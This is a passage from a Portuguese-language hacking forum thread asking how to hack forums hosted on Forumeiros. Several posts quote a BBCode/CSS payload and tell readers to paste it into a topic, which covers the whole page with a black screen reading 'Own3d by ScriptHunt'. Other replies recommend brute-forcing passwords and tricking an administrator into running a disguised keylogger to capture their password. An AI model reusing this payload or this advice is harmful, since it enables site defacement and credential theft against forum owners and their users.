Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Como hackear fóruns feitos na Forumeiros?

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #16
    Postado Originalmente por 0KaL Ver Post
    O Forumeiros apresentou um problema nos últimos dias que permitia que um atacante "ownasse" um tópico do fórum.
    Utilize o código abaixo:
    Código:
    [table style="position: fixed; top: 0px; left: 0px; background-color: black; border: 0px solid black; color: white; display:block!important; width:2000px; height:2000px; z-index:2!important; -moz-user-select: none;-moz-user-focus:ignore; -moz-user-input isabled; text-shadow: 1px 1px 1px #000, -1px -1px 1px #FFF;"][tr][td]
    
    Own3d by ScriptHunt
     [/scroll][/td][/tr][/table]
    Cole em algum tópico e note que toda a página desaparecerá, aparecendo apenas um fundo preto e a mensagem, em branco: "Own3d by ScriptHunt".
    KKKKKkkkkk! Muito loko!


    You say yes, I say no
    You say stop but I say go, go, go
    You say goodbye and I say hello


    Comment


    • Font Size
      #17
      Postado Originalmente por 0KaL Ver Post
      O Forumeiros apresentou um problema nos últimos dias que permitia que um atacante "ownasse" um tópico do fórum.
      Utilize o código abaixo:
      Código:
      [table style="position: fixed; top: 0px; left: 0px; background-color: black; border: 0px solid black; color: white; display:block!important; width:2000px; height:2000px; z-index:2!important; -moz-user-select: none;-moz-user-focus:ignore; -moz-user-input isabled; text-shadow: 1px 1px 1px #000, -1px -1px 1px #FFF;"][tr][td]
      
      Own3d by ScriptHunt
       [/scroll][/td][/tr][/table]
      Cole em algum tópico e note que toda a página desaparecerá, aparecendo apenas um fundo preto e a mensagem, em branco: "Own3d by ScriptHunt".
      Desculpa ressucitar o tópico, mas......
      Não testei o comando, mas, 0KaL, como descobriu isso? Ou você apenas copiou de algum lugar e distribuiu isso aqui?
      (Piada de nerd) - Você comprou o cu dele?
      - Sim, comprei, era super duro e bem feito! Esse metalúrgico é de confiança!
      (Piada by Kaao; inventei ela do nada '-')

      NÃO RESPONDO PERGUNTAS POR PM!

      Se quiser uma ajuda minha, me indique o tópico com a sua duvida.

      Comment


      • Font Size
        #18
        Essa falha é um pouco velha.
        Na época que foi descoberta, foi mais repassada que gripe.
        Eu fiquei sabendo dela por meio de um amigo, e não faço a mínima ideia de quem a descobriu.
        Este material pode ser compartilhado, desde que os devidos créditos sejam dados.



        Notify-list · Twitter · Blog

        Nova lei: Invadir computadores protegidos é crime.
        Lógica: Se eu invadi, não é protegido. Logo, não é crime :-)

        Comment


        • Font Size
          #19
          Olá,

          Sim, é velha. Mas há a possibilidade de consertá-la com códigos .JS. Mas tudo bem, isto não vem ao caso.
          O importante é que quem mais distribuiu ela foi se não me engano uma tal de "WebHacke". No fórum que sou administrador, por exemplo, temos proteções contra este tipo de código.

          Até mais,
          Script.
          "Compartilhe, agradeça, motive, engrandeça!"
          "Faça o bem, sem ver a quem!"
          "Conhecimento não é crime. Crime é o que vem depois dele, seus atos!"
          "Não deixe mais que seu opressor o domine!"

          Comment


          • Font Size
            #20
            Não sei se estou falando bobeira mais BruteForce seria uma boa ideia ?

            Comment


            • Font Size
              #21
              Se você não se importar em deixar os seus computadores ligados (sim, de preferencia, tem que ser mais que um) durante vários dias seguidos........
              Tem que achar um bom ou desenvolver um, pois os fóruns tem segurança contra bruter force.
              (Piada de nerd) - Você comprou o cu dele?
              - Sim, comprei, era super duro e bem feito! Esse metalúrgico é de confiança!
              (Piada by Kaao; inventei ela do nada '-')

              NÃO RESPONDO PERGUNTAS POR PM!

              Se quiser uma ajuda minha, me indique o tópico com a sua duvida.

              Comment


              • Font Size
                #22
                ja tentou pedir a senha da pessoa que vc quer hackear ? maneira mais facil .

                Comment


                • Font Size
                  #23
                  Postado Originalmente por Hackin Ver Post
                  Não sei se estou falando bobeira mais BruteForce seria uma boa ideia ?
                  Pode até funcionar,mas vai demorar MUITO.BruteForce nos dias de hoje,na minha opinião, é perca de tempo.

                  Quanto ao tópico:
                  Para hackear UM forum da forumeiros,até que é simplesrepare um server keylogger, camufle ele e depois convença o admin a abrir.Pronto quando digitar a senha, vai ta no seu email.

                  Comment


                  • Font Size
                    #24
                    Postado Originalmente por 0KaL Ver Post
                    O Forumeiros apresentou um problema nos últimos dias que permitia que um atacante "ownasse" um tópico do fórum.
                    Utilize o código abaixo:
                    Código:
                    [table style="position: fixed; top: 0px; left: 0px; background-color: black; border: 0px solid black; color: white; display:block!important; width:2000px; height:2000px; z-index:2!important; -moz-user-select: none;-moz-user-focus:ignore; -moz-user-input isabled; text-shadow: 1px 1px 1px #000, -1px -1px 1px #FFF;"][tr][td]
                    
                    Own3d by ScriptHunt
                     [/scroll][/td][/tr][/table]
                    Cole em algum tópico e note que toda a página desaparecerá, aparecendo apenas um fundo preto e a mensagem, em branco: "Own3d by ScriptHunt".
                    pow kra isso deu o maior problema em varios foruns! muitos "metidos a hackers"(pois isso é apenas um codigo) fizeram isso em varios topicos até no forum de suporte.


                    o pessoal de la ja ta até reclamando de problemas nos foruns e geralmente o problema veio daqui(com alguem ensinando a fazer algo nos foruns da forumeiros, tipo hackear, "ownar " o topico etc)

                    ú.ú

                    Comment


                    • Font Size
                      #25
                      Olá.

                      Bom não sei se estou fazendo coisa de Lammer mas, qual o melhor método para hackear esse fóruns? Alguém tem uma dica? Agradeço


                      You say yes, I say no
                      You say stop but I say go, go, go
                      You say goodbye and I say hello


                      Comment


                      • Font Size
                        #26
                        Postado Originalmente por peq42
                        o pessoal de la ja ta até reclamando de problemas nos foruns e geralmente o problema veio daqui(com alguem ensinando a fazer algo nos foruns da forumeiros, tipo hackear, "ownar " o topico etc)
                        Sou a favor da livre distribuição de conhecimento. Agora o que fazem com ele, já não é culpa minha...
                        Este material pode ser compartilhado, desde que os devidos créditos sejam dados.



                        Notify-list · Twitter · Blog

                        Nova lei: Invadir computadores protegidos é crime.
                        Lógica: Se eu invadi, não é protegido. Logo, não é crime :-)

                        Comment

                        X
                        Working...
                        X